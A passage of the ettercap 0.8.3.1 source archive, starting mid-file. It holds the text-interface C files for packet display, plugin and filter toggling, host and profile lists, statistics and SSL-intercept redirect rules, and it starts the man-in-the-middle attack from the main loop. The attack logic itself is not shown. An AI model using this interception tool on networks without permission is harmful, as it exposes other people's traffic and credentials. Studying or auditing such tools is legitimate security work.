ops.cleanup = &text_cleanup; ops.msg = &text_msg; ops.error = &text_error; ops.fatal_error = &text_fatal_error; ops.input = &text_input; ops.progress = &text_progress; ops.type = UI_TEXT; ui_register(&ops); /* * add the hook to dispatcher to print the * packets in the right format */ hook_add(HOOK_DISPATCHER, text_print_packet); } /* * set the terminal as non blocking */ static void text_init(void) { /* taken from readchar.c, by M. Andreoli (2000) */ tcgetattr(0, &old_tc); new_tc = old_tc; new_tc.c_lflag &= ~(ECHO | ICANON); /* raw output */ new_tc.c_cc[VTIME] = 1; tcsetattr(0, TCSANOW, &new_tc); } /* * reset to the previous state */ static void text_cleanup(void) { /* flush the last user messages */ ui_msg_flush(MSG_ALL); fprintf(stdout, "\n"); tcsetattr(0, TCSANOW, &old_tc); } /* * print a USER_MSG() */ static void text_msg(const char *msg) { /* avoid implicit format bugs */ fprintf(stdout, "%s", msg); /* allow non buffered messages */ fflush(stdout); } /* * print an error */ static void text_error(const char *msg) { /* avoid implicit format bugs */ fprintf(stdout, "\nFATAL: %s\n\n", msg); /* allow non buffered messages */ fflush(stdout); } /* * handle a fatal error and exit */ static void text_fatal_error(const char *msg) { /* avoid implicit format bugs */ fprintf(stdout, "\n"EC_COLOR_RED"FATAL: "EC_COLOR_END"%s\n\n", msg); /* allow non buffered messages */ fflush(stdout); /* restore console settings */ tcsetattr(0, TCSANOW, &old_tc); /* exit without calling atexit() */ _exit(-1); } /* * display the 'title' and get the 'input' from the user */ static void text_input(const char *title, char *input, size_t n, void (*callback)(void)) { char *p; /* display the title */ fprintf(stdout, "%s", title); fflush(stdout); /* repristinate the buffer input */ tcsetattr(0, TCSANOW, &old_tc); /* wipe the buffer */ memset(input, 0, n); /* get the user input */ fgets(input, n, stdin); /* trim the \n */ if ((p = strrchr(input, '\n')) != NULL) *p = '\0'; else { /* * eat the input until \n * this will happen if the user has entered * more chars than n */ while(getc(stdin) != '\n'); } /* disable buffered input */ tcsetattr(0, TCSANOW, &new_tc); /* * call the supplied function * the callee is aware of the buffer to be used */ if (callback != NULL) callback(); } /* * implement the progress bar */ static int text_progress(char *title, int value, int max) { float percent; int i; /* variable not used */ (void) title; /* calculate the percent */ percent = (float)(value)*100/(max); /* * we use stderr to avoid scrambling of * logfile generated by: ./ettercap -T > logfile */ switch(value % 4) { case 0: fprintf(stderr, "\r| |"); break; case 1: fprintf(stderr, "\r/ |"); break; case 2: fprintf(stderr, "\r- |"); break; case 3: fprintf(stderr, "\r\\ |"); break; } /* fill the bar */ for (i=0; i < percent/2; i++) fprintf(stderr, "="); fprintf(stderr, ">"); /* fill the empty part of the bar */ for(; i < 50; i++) fprintf(stderr, " "); fprintf(stderr, "| %6.2f %%", percent ); fflush(stderr); if (value == max) { fprintf(stderr, "\r* |==================================================>| 100.00 %%\n\n"); return UI_PROGRESS_FINISHED; } return UI_PROGRESS_UPDATED; } /* the interface */ void text_interface(void) { struct plugin_list *plugin, *tmp; DEBUG_MSG("text_interface"); LIST_FOREACH_SAFE(plugin, &EC_GBL_OPTIONS->plugins, next, tmp) { /* check if the specified plugin exists */ if (search_plugin(plugin->name) != E_SUCCESS) { plugin->exists = false; USER_MSG("Sorry, plugin '%s' can not be found - skipping!\n\n", plugin->name); } } /* build the list of active hosts */ build_hosts_list(); /* start the mitm attack */ mitm_start(); /* start the sniffing method */ EXECUTE(EC_GBL_SNIFF->start); /* it is difficult to be interactive while reading from file... */ if (!EC_GBL_OPTIONS->read) { USER_MSG("\nText only Interface activated...\n"); USER_MSG("Hit 'h' for inline help\n\n"); } /* flush all the messages */ ui_msg_flush(MSG_ALL); /* if we have to activate a plugin */ if (!LIST_EMPTY(&EC_GBL_OPTIONS->plugins)) { /* * execute the plugin and close the interface if * the plugin was not found or it has completed * its execution */ LIST_FOREACH_SAFE(plugin, &EC_GBL_OPTIONS->plugins, next, tmp) { if (plugin->exists && text_plugin(plugin->name) != PLUGIN_RUNNING) /* skip plugin */ USER_MSG("Plugin '%s' can not be started - skipping!\n\n", plugin->name); } } /* neverending loop for user input */ LOOP { CANCELLATION_POINT(); /* if there is a pending char to be read */ if (ec_poll_in(fileno(stdin), 10) || ec_poll_buffer(EC_GBL_OPTIONS->script)) { char ch = 0; /* get the input from the stdin or the buffer */ if (ec_poll_buffer(EC_GBL_OPTIONS->script)) ch = getchar_buffer(&EC_GBL_OPTIONS->script); else ch = getchar(); switch(ch) { case 'H': case 'h': text_help(); break; case 'P': case 'p': text_run_plugin(); break; case 'F': case 'f': text_run_filter(); break; case 'S': case 's': text_stats(); break; case 'L': case 'l': text_hosts_list(); break; case 'V': case 'v': text_visualization(); break; case 'O': case 'o': text_profile_list(); break; case 'C': case 'c': text_connections(); break; case ' ': text_stop_cont(); break; case 'R': case 'r': text_redirects(); break; case 'Q': case 'q': USER_MSG("Closing text interface...\n\n"); return; break; } } /* print pending USER_MSG messages */ ui_msg_flush(INT_MAX); } /* NOT REACHED */ } /* print the help screen */ static void text_help(void) { fprintf(stderr, "\nInline help:\n\n"); fprintf(stderr, " [vV] - change the visualization mode\n"); fprintf(stderr, " [pP] - activate a plugin\n"); fprintf(stderr, " [fF] - (de)activate a filter\n"); fprintf(stderr, " [lL] - print the hosts list\n"); fprintf(stderr, " [oO] - print the profiles list\n"); fprintf(stderr, " [cC] - print the connections list\n"); fprintf(stderr, " [rR] - adjust SSL intercept rules\n"); fprintf(stderr, " [sS] - print interfaces statistics\n"); fprintf(stderr, " [] - stop/cont printing packets\n"); fprintf(stderr, " [qQ] - quit\n\n"); } /* * stops or continues to print packets * it is another way to control the -q option */ static void text_stop_cont(void) { /* revert the quiet option */ EC_GBL_OPTIONS->quiet = (EC_GBL_OPTIONS->quiet) ? 0 : 1; if (EC_GBL_OPTIONS->quiet) fprintf(stderr, "\nPacket visualization stopped...\n"); else fprintf(stderr, "\nPacket visualization restarted...\n"); } /* * display a list of plugin, and prompt * the user for a plugin to run. */ static void text_run_plugin(void) { char name[20]; int restore = 0; char *p; #ifndef HAVE_PLUGINS fprintf(stderr, "Plugin support was not compiled in..."); return; #endif /* there are no plugins */ if (text_plugin("list") == -E_NOTFOUND) return; /* stop the visualization while the plugin interface is running */ if (!EC_GBL_OPTIONS->quiet) { text_stop_cont(); restore = 1; } /* print the messages created by text_plugin */ ui_msg_flush(MSG_ALL); /* repristinate the buffer input */ tcsetattr(0, TCSANOW, &old_tc); fprintf(stdout, "Plugin name (0 to quit): "); fflush(stdout); /* get the user input */ fgets(name, 20, stdin); /* trim the \n */ if ((p = strrchr(name, '\n')) != NULL) *p = '\0'; /* disable buffered input */ tcsetattr(0, TCSANOW, &new_tc); if (!strcmp(name, "0")) { if (restore) text_stop_cont(); return; } /* run the plugin */ text_plugin(name); /* continue the visualization */ if (restore) text_stop_cont(); } static int text_print_filter_cb(struct filter_list *l, void *arg) { int *i = (int *)arg; fprintf(stdout, "[%d (%d)]: %s\n", (*i)++, l->enabled, l->name); return 1; } static int text_toggle_filter_cb(struct filter_list *l, void *arg) { int *number = (int *)arg; if (!--(*number)) { /* we reached the item */ l->enabled = ! l->enabled; return 0; /* no need to traverse the list any further */ } return 1; } /* * display the list of loaded filters and * allow the user to enable or disable them */ static void text_run_filter(void) { int restore = 0; /* stop the visualization while the plugin interface is running */ if (!EC_GBL_OPTIONS->quiet) { text_stop_cont(); restore = 1; } ui_msg_flush(MSG_ALL); fprintf(stderr, "\nLoaded etterfilter scripts:\n\n"); while(1) { char input[20]; int i = 1; int number = -1; /* repristinate the buffer input */ tcsetattr(0, TCSANOW, &old_tc); filter_walk_list( text_print_filter_cb, &i ); int c; do { fprintf(stdout, "\nEnter a number to enable/disable filter (0 to quit): "); /* get the user input */ fgets(input, 19, stdin); number = -1; c=sscanf(input, "%d", &number); if(c!=1) fprintf(stdout, "\nYou need to enter a number, please try again."); } while(c!=1); if (number == 0) { break; } else if (number > 0) { filter_walk_list( text_toggle_filter_cb, &number ); } }; /* disable buffered input */ tcsetattr(0, TCSANOW, &new_tc); /* continue the visualization */ if (restore) text_stop_cont(); } /* * print the interface statistics */ static void text_stats(void) { DEBUG_MSG("text_stats (pcap) : %" PRIu64 " %" PRIu64 " %" PRIu64, EC_GBL_STATS->ps_recv, EC_GBL_STATS->ps_drop, EC_GBL_STATS->ps_ifdrop); DEBUG_MSG("text_stats (BH) : [%lu][%lu] p/s -- [%lu][%lu] b/s", EC_GBL_STATS->bh.rate_adv, EC_GBL_STATS->bh.rate_worst, EC_GBL_STATS->bh.thru_adv, EC_GBL_STATS->bh.thru_worst); DEBUG_MSG("text_stats (TH) : [%lu][%lu] p/s -- [%lu][%lu] b/s", EC_GBL_STATS->th.rate_adv, EC_GBL_STATS->th.rate_worst, EC_GBL_STATS->th.thru_adv, EC_GBL_STATS->th.thru_worst); DEBUG_MSG("text_stats (queue) : %lu %lu", EC_GBL_STATS->queue_curr, EC_GBL_STATS->queue_max); fprintf(stdout, "\n Received packets : %8" PRIu64 "\n", EC_GBL_STATS->ps_recv); fprintf(stdout, " Dropped packets : %8" PRIu64 " %.2f %%\n", EC_GBL_STATS->ps_drop, (EC_GBL_STATS->ps_recv) ? (float)EC_GBL_STATS->ps_drop * 100 / EC_GBL_STATS->ps_recv : 0 ); fprintf(stdout, " Forwarded : %8" PRIu64 " bytes: %8" PRIu64 "\n\n", EC_GBL_STATS->ps_sent, EC_GBL_STATS->bs_sent); fprintf(stdout, " Current queue len : %lu/%lu\n", EC_GBL_STATS->queue_curr, EC_GBL_STATS->queue_max); fprintf(stdout, " Sampling rate : %d\n\n", EC_GBL_CONF->sampling_rate); fprintf(stdout, " Bottom Half received packet : pck: %8" PRIu64 " byte: %8" PRIu64 "\n", EC_GBL_STATS->bh.pck_recv, EC_GBL_STATS->bh.pck_size); fprintf(stdout, " Top Half received packet : pck: %8" PRIu64 " byte: %8" PRIu64 "\n", EC_GBL_STATS->th.pck_recv, EC_GBL_STATS->th.pck_size); fprintf(stdout, " Interesting packets : %.2f %%\n\n", (EC_GBL_STATS->bh.pck_recv) ? (float)EC_GBL_STATS->th.pck_recv * 100 / EC_GBL_STATS->bh.pck_recv : 0 ); fprintf(stdout, " Bottom Half packet rate : worst: %8lu adv: %8lu p/s\n", EC_GBL_STATS->bh.rate_worst, EC_GBL_STATS->bh.rate_adv); fprintf(stdout, " Top Half packet rate : worst: %8lu adv: %8lu p/s\n\n", EC_GBL_STATS->th.rate_worst, EC_GBL_STATS->th.rate_adv); fprintf(stdout, " Bottom Half throughput : worst: %8lu adv: %8lu b/s\n", EC_GBL_STATS->bh.thru_worst, EC_GBL_STATS->bh.thru_adv); fprintf(stdout, " Top Half throughput : worst: %8lu adv: %8lu b/s\n\n", EC_GBL_STATS->th.thru_worst, EC_GBL_STATS->th.thru_adv); } /* * prints the hosts list */ static void text_hosts_list(void) { struct hosts_list *hl; char ip[MAX_ASCII_ADDR_LEN]; char mac[MAX_ASCII_ADDR_LEN]; int i = 1; fprintf(stdout, "\n\nHosts list:\n\n"); /* print the list */ LIST_FOREACH(hl, &EC_GBL_HOSTLIST, next) { ip_addr_ntoa(&hl->ip, ip); mac_addr_ntoa(hl->mac, mac); if (hl->hostname) fprintf(stdout, "%d)\t%s\t%s\t%s\n", i++, ip, mac, hl->hostname); else fprintf(stdout, "%d)\t%s\t%s\n", i++, ip, mac); } fprintf(stdout, "\n\n"); } /* * prompt the user for the visualization mode */ static void text_visualization(void) { char format[16]; int restore = 0; /* stop the visualization while the plugin interface is running */ if (!EC_GBL_OPTIONS->quiet) { text_stop_cont(); restore = 1; } /* repristinate the buffere input */ tcsetattr(0, TCSANOW, &old_tc); fprintf(stdout, "\n\nVisualization format: "); fflush(stdout); scanf("%15s", format); /* disable buffered input */ tcsetattr(0, TCSANOW, &new_tc); /* set the format */ set_format(format); /* continue the packet printing */ if (restore) text_stop_cont(); } /* * enter the profile interface */ static void text_profile_list(void) { int restore = 0; /* stop the visualization while the profiles interface is running */ if (!EC_GBL_OPTIONS->quiet) { text_stop_cont(); restore = 1; } /* execute the profiles interface */ text_profiles(); /* continue the visualization */ if (restore) text_stop_cont(); } /* * print all redirect rules and ask user to add or delete */ static void text_redirects(void) { char input[20]; int restore = 0, num, ret; char *p, cmd; /* print registered entries */ text_redirect_print(); /* stop the virtualization while the redirect interface is running */ if (!EC_GBL_OPTIONS->quiet) { text_stop_cont(); restore = 1; } /* print all pending user messages */ ui_msg_flush(MSG_ALL); tcsetattr(0, TCSANOW, &old_tc); /* print instructions */ fprintf(stdout, "'d ' to delete or 'i' to insert new redirect " "(0 to quit): "); fflush(stdout); /* get user input */ fgets(input, 20, stdin); do { /* remote trailing line feed */ if ((p = strrchr(input, '\n')) != NULL) *p = 0; ret = sscanf(input, "%c %d", &cmd, &num); if (ret == 1 && tolower(cmd) == 'i') { text_redirect_add(); /* print registered entries */ text_redirect_print(); } else if (ret == 2 && tolower(cmd) == 'd') { text_redirect_del(num); /* print registered entries */ text_redirect_print(); } else if (!strcmp(input, "0") || !strcmp(input, "exit")) break; else INSTANT_USER_MSG("Invalid input\n"); /* print instructions */ fprintf(stdout, "'d ' to delete or 'i' to insert new redirect " "(0 to quit): "); fflush(stdout); } while (fgets(input, 20, stdin) != NULL); /* disable buffered input */ tcsetattr(0, TCSANOW, &new_tc); if (restore) text_stop_cont(); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/text/ec_text.h000664 000000 000000 00000000632 13711276346 021165 0ustar00rootroot000000 000000 #ifndef ETTERCAP_TEXT_H #define ETTERCAP_TEXT_H extern void set_text_interface(void); extern int text_plugin(char *plugin); extern void text_print_packet(struct packet_object *po); extern void text_profiles(void); extern void text_connections(void); extern void text_redirect_print(void); extern void text_redirect_add(void); extern void text_redirect_del(int num); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/text/ec_text_conn.c000664 000000 000000 00000003023 13711276346 022172 0ustar00rootroot000000 000000 /* ettercap -- diplay the connection list Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include /* globals */ /* proto */ void text_connections(void); /*******************************************/ void text_connections(void) { void *list; char *desc; SAFE_CALLOC(desc, 160, sizeof(char)); /* retrieve the first element */ list = conntrack_print(0, NULL, NULL, 0); fprintf(stdout, "\nConnections list:\n\n"); /* walk the connection list */ while(list) { /* get the next element */ list = conntrack_print(+1, list, &desc, 159); fprintf(stdout, "%s\n", desc); } fprintf(stdout, "\n"); SAFE_FREE(desc); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/text/ec_text_display.c000664 000000 000000 00000007633 13711276346 022715 0ustar00rootroot000000 000000 /* ettercap -- formats and displays the packets Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include /* proto */ void text_print_packet(struct packet_object *po); static void display_headers(struct packet_object *po); /*******************************************/ void text_print_packet(struct packet_object *po) { /* * keep it static so it is always the same * memory region used for this operation */ static u_char *tmp = NULL; int ret; /* don't display the packet */ if (EC_GBL_OPTIONS->quiet) return; /* * if the regex does not match, the packet is not interesting * * should we put this after the format function ? * in this way we can match e.t.t.e.r.c.a.p in TEXT mode with * the "ettercap" regex */ if (EC_GBL_OPTIONS->regex && regexec(EC_GBL_OPTIONS->regex, (const char *)po->DATA.disp_data, 0, NULL, 0) != 0) { return; } /* * prepare the buffer, * the max length is hex_fomat * so use its length for the buffer */ SAFE_REALLOC(tmp, hex_len(po->DATA.disp_len) * sizeof(u_char)); /* * format the packet with the function set by the user */ ret = EC_GBL_FORMAT(po->DATA.disp_data, po->DATA.disp_len, tmp); /* print the headers */ display_headers(po); /* sync stream/descriptor output and print the packet */ fflush(stdout); write(fileno(stdout), tmp, ret); } static void display_headers(struct packet_object *po) { char tmp1[MAX_ASCII_ADDR_LEN]; char tmp2[MAX_ASCII_ADDR_LEN]; char flags[10]; char *p = flags; char proto[5]; memset(flags, 0, sizeof(flags)); memset(proto, 0, sizeof(proto)); /* display the date. ec_ctime() has no newline at end. */ #if defined OS_DARWIN fprintf(stdout, "\n\n%s [%d]\n", ec_ctime(&po->ts), po->ts.tv_usec); #else fprintf(stdout, "\n\n%s [%lu]\n", ec_ctime(&po->ts), po->ts.tv_usec); #endif if (EC_GBL_OPTIONS->ext_headers) { /* display the mac addresses */ mac_addr_ntoa(po->L2.src, tmp1); mac_addr_ntoa(po->L2.dst, tmp2); fprintf(stdout, "%17s --> %17s\n", tmp1, tmp2 ); } /* calculate the flags */ if (po->L4.flags & TH_SYN) *p++ = 'S'; if (po->L4.flags & TH_FIN) *p++ = 'F'; if (po->L4.flags & TH_RST) *p++ = 'R'; if (po->L4.flags & TH_ACK) *p++ = 'A'; if (po->L4.flags & TH_PSH) *p++ = 'P'; if (po->L4.flags & TH_URG) *p++ = 'U'; if (po->L4.flags & TH_ECE) *p++ = 'E'; /* rfc 2481/3168 */ if (po->L4.flags & TH_CWR) *p++ = 'C'; /* rfc 2481/3168 */ *p++ = '\0'; /* determine the proto */ switch(po->L4.proto) { case NL_TYPE_TCP: strncpy(proto, "TCP", 4); break; case NL_TYPE_UDP: strncpy(proto, "UDP", 4); break; } /* display the ip addresses */ ip_addr_ntoa(&po->L3.src, tmp1); ip_addr_ntoa(&po->L3.dst, tmp2); fprintf(stdout, "%s %s:%d --> %s:%d | %s (%zu)\n", proto, tmp1, ntohs(po->L4.src), tmp2, ntohs(po->L4.dst), flags, po->DATA.disp_len); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/text/ec_text_plugin.c000664 000000 000000 00000005133 13711276346 022537 0ustar00rootroot000000 000000 /* ettercap -- text GUI for plugin management Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include /* proto */ int text_plugin(char *plugin); static void text_plugin_list(char active, struct plugin_ops *ops); /*******************************************/ /* the interface */ int text_plugin(char *plugin) { int type; DEBUG_MSG("text_plugin: %s", plugin); /* * if the plugin name is "list", print the * plugin list and exit */ if (!strcasecmp(plugin, "list")) { /* delete any previous message */ ui_msg_purge_all(); INSTANT_USER_MSG("\nAvailable plugins :\n\n"); type = plugin_list_walk(PLP_MIN, PLP_MAX, &text_plugin_list); if (type == -E_NOTFOUND) FATAL_MSG("No plugin found !\n"); INSTANT_USER_MSG("\n\n"); /* * return an error, so the text interface * ends and returns to main */ return -E_INVALID; } /* check if the plugin exists */ if (search_plugin(plugin) != E_SUCCESS) FATAL_MSG("%s plugin can not be found !", plugin); if (plugin_is_activated(plugin) == 0) INSTANT_USER_MSG("Activating %s plugin...\n\n", plugin); else INSTANT_USER_MSG("Deactivating %s plugin...\n\n", plugin); /* * pay attention on this ! * if the plugin init does not return, * we are blocked here. So it is encouraged * to write plugins which spawn a thread * and immediately return */ if (plugin_is_activated(plugin) == 1) return plugin_fini(plugin); else return plugin_init(plugin); } /* * callback function for displaying the plugin list */ static void text_plugin_list(char active, struct plugin_ops *ops) { INSTANT_USER_MSG("[%d] %15s %4s %s\n", active, ops->name, ops->version, ops->info); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/text/ec_text_profile.c000664 000000 000000 00000012363 13711276346 022704 0ustar00rootroot000000 000000 /* ettercap -- diplay the collected profiles Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include #ifdef OS_WINDOWS #include #else #include #endif /* globals */ /* declared in ec_text.c */ extern struct termios old_tc; extern struct termios new_tc; /* proto */ void text_profiles(void); static void detail_hosts(int type); static void detail_select(void); static void detail_help(void); /*******************************************/ void text_profiles(void) { detail_help(); LOOP { CANCELLATION_POINT(); /* if there is a pending char to be read */ if ( ec_poll_in(fileno(stdin), 10) || ec_poll_buffer(EC_GBL_OPTIONS->script) ) { char ch = 0; /* get the input from the stdin or the buffer */ if (ec_poll_buffer(EC_GBL_OPTIONS->script)) ch = getchar_buffer(&EC_GBL_OPTIONS->script); else ch = getchar(); switch(ch) { case 'H': case 'h': detail_help(); break; case 'L': case 'l': detail_hosts(FP_HOST_LOCAL); break; case 'R': case 'r': detail_hosts(FP_HOST_NONLOCAL); break; case 'S': case 's': detail_select(); break; case 'p': profile_purge_local(); USER_MSG("LOCAL hosts purged !\n"); break; case 'P': profile_purge_remote(); USER_MSG("REMOTE hosts purged !\n"); break; case 'Q': case 'q': USER_MSG("Returning to main menu...\n"); ui_msg_flush(1); return; break; } } /* print pending USER_MSG messages */ ui_msg_flush(10); } /* NOT REACHED */ } /* * print the help screen */ static void detail_help(void) { fprintf(stderr, "\n\n [PROFILES] Inline help:\n\n"); fprintf(stderr, " [lL] - detail on local hosts\n"); fprintf(stderr, " [rR] - detail on remote hosts\n"); fprintf(stderr, " [sS] - select a specific host\n"); fprintf(stderr, " [p] - purge local hosts\n"); fprintf(stderr, " [P] - purge remote hosts\n"); fprintf(stderr, " [qQ] - return to main interface\n\n"); } /* * print the list of TYPE (local or remote) hosts */ static void detail_hosts(int type) { struct host_profile *h; int at_least_one = 0; /* go thru the list and print a profile for each host */ TAILQ_FOREACH(h, &EC_GBL_PROFILES, next) { if (h->type & type) { at_least_one = 1; /* print the host infos */ print_host(h); } } /* there aren't any profiles */ if (!at_least_one) { if (EC_GBL_OPTIONS->read) { fprintf(stdout, "Can't determine host type when reading from file !!\n"); fprintf(stdout, "Use the select option !!\n"); } else fprintf(stdout, "No collected profiles !!\n"); } } /* * print the list of all collected hosts * and prompt for a choice */ static void detail_select(void) { struct host_profile *h; char tmp[MAX_ASCII_ADDR_LEN]; int i = 0, n = -1; /* go thru the list and print a profile for each host */ TAILQ_FOREACH(h, &EC_GBL_PROFILES, next) { fprintf(stdout, "%2d) %15s %s\n", ++i, ip_addr_ntoa(&h->L3_addr, tmp), h->hostname); } /* there aren't any profiles */ if (i == 0) { fprintf(stdout, "No collected profiles !!\n"); return; } fprintf(stdout, "Select an host to display (0 for all, -1 to quit): "); fflush(stdout); /* enable buffered input and echo */ tcsetattr(0, TCSANOW, &old_tc); /* get the user input */ scanf("%d", &n); /* disable buffered input */ tcsetattr(0, TCSANOW, &new_tc); fprintf(stdout, "\n\n"); /* do the proper action */ switch(n) { case -1: /* quit with no action */ return; break; case 0: /* print ALL the profiles */ TAILQ_FOREACH(h, &EC_GBL_PROFILES, next) print_host(h); break; default: i = 1; TAILQ_FOREACH(h, &EC_GBL_PROFILES, next) { if (i++ == n) print_host(h); } break; } } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/text/ec_text_redirect.c000664 000000 000000 00000012560 13711276346 023044 0ustar00rootroot000000 000000 /* ettercap -- text GUI for SSL redirect management Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* proto */ static void text_redirect_print_rule(struct redir_entry *re); static void text_redirect_print_serv(struct serv_entry *se); /* globals */ struct redir_entry **redirect_list = NULL; struct serv_entry **service_list = NULL; int n_redir = 0; int n_serv = 0; /********************************/ void text_redirect_print(void) { /* free list of redirects if allocated before */ SAFE_FREE(redirect_list); SAFE_FREE(service_list); n_redir = 0; /* print header */ fprintf(stdout, "SSL Intercepts\n"); fprintf(stdout, " # IP Version %25s Service\n", "Server IP"); /* print rules */ ec_walk_redirects(text_redirect_print_rule); } /* * delete redirect */ void text_redirect_del(int num) { int ret; struct redir_entry *re; if (num < 1 || num > n_redir) { INSTANT_USER_MSG("Entered number '%d' is not in the range of " "registered redirects.\n", num); return; } re = redirect_list[num - 1]; ret = ec_redirect(EC_REDIR_ACTION_REMOVE, re->name, re->proto, re->destination, re->from_port, re->to_port); if (ret == E_SUCCESS) INSTANT_USER_MSG("Redirect removed successfully\n", (re->proto == EC_REDIR_PROTO_IPV4 ? "ipv4" : "ipv6"), re->destination, re->name); else INSTANT_USER_MSG("Removing redirect [%s] %s -> %s:%s failed!\n", (re->proto == EC_REDIR_PROTO_IPV4 ? "ipv4" : "ipv6"), re->destination, re->name); } /* * add a redirect rule */ void text_redirect_add(void) { char ipver[20], service[20]; char destinationbuf[MAX_ASCII_ADDR_LEN]; char *p, *destination; int i, ret, found = 0, invalid = 0; ec_redir_proto_t proto; fprintf(stdout, "Interceptable services: \n"); /* print available services */ SAFE_FREE(service_list); n_serv = 0; ec_walk_redirect_services(text_redirect_print_serv); fprintf(stdout, "\n\n"); fprintf(stdout, "IP version [ipv4]: "); fgets(ipver, 20, stdin); /* remove trailing line feed */ if ((p = strrchr(ipver, '\n')) != NULL) *p = 0; fprintf(stdout, "Server IP [any]: "); fgets(destinationbuf, MAX_ASCII_ADDR_LEN, stdin); /* remove trailing line feed */ if ((p = strrchr(destinationbuf, '\n')) != NULL) *p = 0; fprintf(stdout, "Service [ftps]: "); fgets(service, 20, stdin); /* remove trailing line feed */ if ((p = strrchr(service, '\n')) != NULL) *p = 0; /* check user input for IP version */ if (!strcmp(ipver, "") || !strcasecmp(ipver, "ipv4")) proto = EC_REDIR_PROTO_IPV4; else if (!strcasecmp(ipver, "ipv6")) proto = EC_REDIR_PROTO_IPV6; else { INSTANT_USER_MSG("Invalid IP version entered. " "Either \"ipv4\" or \"ipv6\"\n"); invalid = 1; } /* check user input for server IP */ if (!strcmp(destinationbuf, "") || !strcasecmp(destinationbuf, "any")) destination = NULL; else destination = destinationbuf; /* check user input for service */ if (!strcmp(service, "")) strcpy(service, "ftps"); for (i = 0; i < n_serv; i++) { if (!strcasecmp(service, service_list[i]->name)) { found = 1; break; } } if (found == 0) { INSTANT_USER_MSG("Invalid interceptable service entered.\n"); invalid = 1; } if (invalid == 1) { INSTANT_USER_MSG("Redirect could not be inserted due to invalid " "input.\n"); return; } ret = ec_redirect(EC_REDIR_ACTION_INSERT, service_list[i]->name, proto, destination, service_list[i]->from_port, service_list[i]->to_port); if (ret == E_SUCCESS) INSTANT_USER_MSG("New redirect inserted successfully.\n"); else INSTANT_USER_MSG("Insertion of new redirect failed.\n"); } /* * print a redirect rule */ static void text_redirect_print_rule(struct redir_entry *re) { /* allocate a new entry in the list and safe redir pointer */ SAFE_REALLOC(redirect_list, (n_redir+1) * sizeof(struct redir_entry *)); redirect_list[n_redir] = re; n_redir++; /* print the rule */ fprintf(stdout, "%2d %5s %30s %s\n", n_redir, (re->proto == EC_REDIR_PROTO_IPV4 ? "ipv4" : "ipv6"), re->destination, re->name); } /* * print a registered redirect service name */ static void text_redirect_print_serv(struct serv_entry *se) { /* allocate new entry in the list and rember service */ SAFE_REALLOC(service_list, (n_serv+1) * sizeof(struct serv_entry *)); service_list[n_serv] = se; n_serv++; fprintf(stdout, "\t%d. %s\n", n_serv, se->name); } ettercap-0.8.3.1/src/lua/000775 000000 000000 00000000000 13711276346 015032 5ustar00rootroot000000 000000 ettercap-0.8.3.1/src/lua/CMakeLists.txt000664 000000 000000 00000001331 13711276346 017570 0ustar00rootroot000000 000000 set(INSTALL_LUA_ROOT ${INSTALL_DATADIR}/ettercap/lua) set(INSTALL_LUA_INIT ${INSTALL_LUA_ROOT}/init.lua) set(INSTALL_LUA_CORE ${INSTALL_LUA_ROOT}/core) set(INSTALL_LUA_LIBS ${INSTALL_LUA_ROOT}/lib) set(INSTALL_LUA_THIRD_PARTY ${INSTALL_LUA_ROOT}/third-party) set(INSTALL_LUA_SCRIPTS ${INSTALL_LUA_ROOT}/scripts) configure_file(ec_lua_config.h.cmake ${CMAKE_CURRENT_BINARY_DIR}/include/ec_lua_config.h) # Take care of building our C-based stuff. include_directories(${CMAKE_CURRENT_BINARY_DIR}/include) include_directories(${LUAJIT_INCLUDE_DIR}) add_library(ec_lua ec_lua.c) set_target_properties(ec_lua PROPERTIES POSITION_INDEPENDENT_CODE ON) add_dependencies(ec_lua luajit) # Add our 'shared' code. add_subdirectory(share) 